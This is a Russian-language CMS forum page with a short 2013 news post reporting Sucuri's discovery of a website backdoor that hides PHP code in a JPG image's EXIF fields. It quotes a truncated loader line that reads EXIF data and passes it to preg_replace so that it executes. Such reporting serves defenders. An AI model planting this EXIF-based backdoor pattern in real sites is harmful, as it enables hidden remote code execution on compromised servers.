Язык
Контакты
GitHub
Поддержка
Регистрация
Войти
Логин: Пароль: Запомнить:
Пользователи
Голосование

    Какую CMS Вы предпочитаете

    AtomX
    Fapos CMS
    Drunya CMS
Последние комментарии
Топ пользователей
Drunya
Репутация: 110
Сообщений: 3527
Сашка_из_Шебекино
Репутация: 87
Сообщений: 1803
boriska
Репутация: 65
Сообщений: 846
ARMI
Репутация: 46
Сообщений: 1858
BAH0
Репутация: 26
Сообщений: 544
Главная » Новости
Всего материалов:1
1
Компания Sucuri обнаружила новый способ внедрения бэкдора на веб-сайт: код прячется в служебном поле EXIF изображения JPG. Это может
быть или новое изображение, которое пользователям разрешено добавлять на
сайт, например, в качестве своего аватара или другой фотографии на
форуме. Или это может быть измененная версия оригинального изображения.

На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для
считывания служебных данных EXIF из файла JPG, а вторая функция
запускает программу.

Code:
$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');preg_replace($exif['Make'],$exif['Model'],'
Автор: Сашка_из_Шебекино Раздел: Разное Добавлено: 17 Июл 2013
1
Категории:
Сейчас online: 48. Зарегистрированных: 0. Гостей: 48.
-->